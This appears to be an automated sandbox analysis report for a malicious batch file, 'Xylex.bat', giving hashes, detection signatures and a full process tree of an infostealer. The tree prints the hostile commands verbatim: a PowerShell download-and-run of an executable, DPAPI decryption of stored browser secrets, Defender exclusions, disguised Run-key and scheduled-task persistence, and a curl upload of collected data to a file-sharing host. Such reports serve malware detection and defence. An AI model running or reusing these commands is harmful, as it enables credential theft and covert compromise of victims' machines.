Analysis
max time kernel: 121s
max time network: 142s
platform: windows11-21h2_x64
resource: win11-20240426-en
resource tags: arch:x64 arch:x86 image:win11-20240426-en locale:en-us os:windows11-21h2-x64 system
submitted: 03/06/2024, 04:13
Static task
static1
Behavioral task
behavioral1
Sample
Executor/Xylex.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Executor/Xylex.bat
Resource
win11-20240426-en
General
Target: Executor/Xylex.bat
Size: 255B
MD5: aa385e3b4104f4529680f554cdc39b40
SHA1: 00ab4c02495c60b0fce2ec3e6967b864e1156cae
SHA256: e0cf8ed28a7efbcb910b6e7d78641179e39a81fae787308eb6112745e59f1076
SHA512: ad06ece28950fa050775f899d0574c44ccf86912f465bd5e7c041b972173ef16a34a6857be8dfb1bd13163099d710b9fcf3c09a110f406e3a8608e71df16c66e
Malware Config
Extracted
https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe
Signatures
-
Blocklisted process makes network request 4 IoCs
flow  pid   Process
2     2628  powershell.exe
3     2628  powershell.exe
5     3232  curl.exe
13    4708  curl.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid   Process
2196  powershell.exe
3736  powershell.exe
4248  powershell.exe
1360  powershell.exe
5108  powershell.exe
-
Executes dropped EXE 1 IoCs
pid   Process
396   xylex.exe
-
Loads dropped DLL 1 IoCs
pid   Process
396   xylex.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\OyLwFgcPpobCkad.ps1\""
Process: powershell.exe

description: Set value (str)
ioc: \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe"
Process: reg.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
4     api.ipify.org
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid   Process
2572  cmd.exe
2984  cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid   Process
3760  schtasks.exe
-
Detects videocard installed 1 TTPs 12 IoCs
Uses WMIC.exe to determine videocard installed.
pid   Process
1696  WMIC.exe
1916  WMIC.exe
4720  WMIC.exe
1000  WMIC.exe
4692  WMIC.exe
1028  WMIC.exe
1960  WMIC.exe
4652  WMIC.exe
2980  WMIC.exe
2416  WMIC.exe
2640  WMIC.exe
428   WMIC.exe
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid   Process
2932  tasklist.exe
4784  tasklist.exe
-
Modifies registry key 1 TTPs 2 IoCs
pid   Process
2948  reg.exe
2880  reg.exe
-
Suspicious behavior: EnumeratesProcesses 43 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"4⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "5⤵PID:484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1lbjxtdh\1lbjxtdh.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D9E.tmp" "c:\Users\Admin\AppData\Local\Temp\1lbjxtdh\CSC7912D2EB102E469BAB2DA46F11C232B8.TMP"7⤵PID:1960
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵
- Blocklisted process makes network request
PID:3232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4784
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,239,201,125,189,85,50,4,60,86,187,43,137,41,48,196,233,213,129,190,11,15,149,32,64,239,3,143,191,59,101,111,20,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,246,135,251,0,181,183,233,186,114,15,245,188,208,245,31,150,9,200,137,27,9,44,246,144,174,248,175,185,252,40,48,213,48,0,0,0,236,53,216,175,7,179,81,168,213,78,218,191,50,236,204,3,79,205,25,29,20,21,118,162,19,255,75,116,186,60,19,24,12,29,72,121,224,200,28,184,3,195,243,72,223,119,33,196,64,0,0,0,253,80,200,208,20,202,93,188,38,34,78,69,205,85,213,2,96,16,4,77,242,30,93,195,25,218,103,153,123,80,11,122,104,181,58,74,206,183,127,13,129,250,64,230,58,127,189,83,243,131,247,91,172,24,239,115,71,16,186,85,38,25,239,134), $null, 'CurrentUser')"4⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,239,201,125,189,85,50,4,60,86,187,43,137,41,48,196,233,213,129,190,11,15,149,32,64,239,3,143,191,59,101,111,20,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,246,135,251,0,181,183,233,186,114,15,245,188,208,245,31,150,9,200,137,27,9,44,246,144,174,248,175,185,252,40,48,213,48,0,0,0,236,53,216,175,7,179,81,168,213,78,218,191,50,236,204,3,79,205,25,29,20,21,118,162,19,255,75,116,186,60,19,24,12,29,72,121,224,200,28,184,3,195,243,72,223,119,33,196,64,0,0,0,253,80,200,208,20,202,93,188,38,34,78,69,205,85,213,2,96,16,4,77,242,30,93,195,25,218,103,153,123,80,11,122,104,181,58,74,206,183,127,13,129,250,64,230,58,127,189,83,243,131,247,91,172,24,239,115,71,16,186,85,38,25,239,134), $null, 'CurrentUser')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,64,71,148,20,56,45,62,124,213,252,32,214,91,152,25,96,161,38,54,100,221,34,34,64,80,213,100,42,63,170,132,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,232,221,23,18,160,226,22,152,228,243,194,190,221,56,200,24,104,100,48,146,36,36,248,213,15,145,128,202,194,178,60,110,48,0,0,0,21,151,46,188,247,62,218,248,248,76,77,167,103,205,215,78,200,127,228,5,114,231,15,170,166,152,172,121,109,64,173,73,122,176,112,236,136,94,118,5,136,254,112,46,5,221,11,191,64,0,0,0,55,180,127,118,64,244,99,236,146,115,4,200,209,110,24,141,239,130,207,224,69,68,52,198,114,116,25,174,214,122,204,234,229,27,215,233,195,201,61,105,107,153,131,253,250,154,23,145,203,204,133,47,242,121,107,222,77,240,182,223,71,140,69,32), $null, 'CurrentUser')"4⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,64,71,148,20,56,45,62,124,213,252,32,214,91,152,25,96,161,38,54,100,221,34,34,64,80,213,100,42,63,170,132,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,232,221,23,18,160,226,22,152,228,243,194,190,221,56,200,24,104,100,48,146,36,36,248,213,15,145,128,202,194,178,60,110,48,0,0,0,21,151,46,188,247,62,218,248,248,76,77,167,103,205,215,78,200,127,228,5,114,231,15,170,166,152,172,121,109,64,173,73,122,176,112,236,136,94,118,5,136,254,112,46,5,221,11,191,64,0,0,0,55,180,127,118,64,244,99,236,146,115,4,200,209,110,24,141,239,130,207,224,69,68,52,198,114,116,25,174,214,122,204,234,229,27,215,233,195,201,61,105,107,153,131,253,250,154,23,145,203,204,133,47,242,121,107,222,77,240,182,223,71,140,69,32), $null, 'CurrentUser')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"4⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"4⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f5⤵PID:428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"4⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM5⤵
- Creates scheduled task(s)
PID:3760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""4⤵
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:2196 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jrtvppjd\jrtvppjd.cmdline"6⤵PID:380
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp" "c:\Users\Admin\AppData\Local\Temp\jrtvppjd\CSC9833EEABE32E432F97135D1DABD333AC.TMP"7⤵PID:4920
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""4⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"5⤵PID:2484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "6⤵PID:5116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4248
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f7⤵
- Adds Run key to start application
- Modifies registry key
PID:2948
-
-
C:\Windows\system32\reg.exereg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"7⤵
- Modifies registry key
PID:2880
-
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE7⤵PID:3304
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"4⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get serialnumber5⤵PID:2492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:1716
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:3424
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"4⤵PID:2480
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid5⤵PID:2136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:4444
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:2772
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4868
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"4⤵PID:2972
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Description,PNPDeviceID5⤵PID:3120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"4⤵PID:484
-
C:\Windows\System32\Wbem\WMIC.exewmic memorychip get serialnumber5⤵PID:3488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:772
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:1804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"4⤵PID:2932
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"4⤵PID:3956
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get processorid5⤵PID:4904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:5032
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:3108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "getmac /NH"4⤵PID:4108
-
C:\Windows\system32\getmac.exegetmac /NH5⤵PID:3500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:3232
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:4320
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:428
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:3552
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:3124
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:1076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:4596
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:4872
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:3088
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:1192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:3712
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:2228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:3316
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵
- Blocklisted process makes network request
PID:4708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:4480
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:3268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:3320
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:2028
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:2616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:1580
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:2116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:700
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:3100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""4⤵PID:4852
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Dwcxzjlh.zip";"4⤵PID:1160
-
C:\Windows\system32\curl.execurl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Dwcxzjlh.zip";5⤵PID:4840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:4400
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:3232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:3872
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:2804
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:4556
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:4720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:5040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:4596
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:3632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:1896
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:2688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:4892
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:1800
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:1716
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1000
-
-
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" 4⤵ PID:1696
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName 5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" 4⤵ PID:892
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke 5⤵ PID:1992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" 4⤵ PID:4708
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion 5⤵ PID:2972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" 4⤵ PID:2720
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list 5⤵ PID:4868
C:\Windows\system32\find.exe
find /i "Speed" 5⤵ PID:2456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" 4⤵ PID:1080
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name 5⤵
- Detects videocard installed
PID:4692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" 4⤵ PID:4800
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName 5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" 4⤵ PID:3684
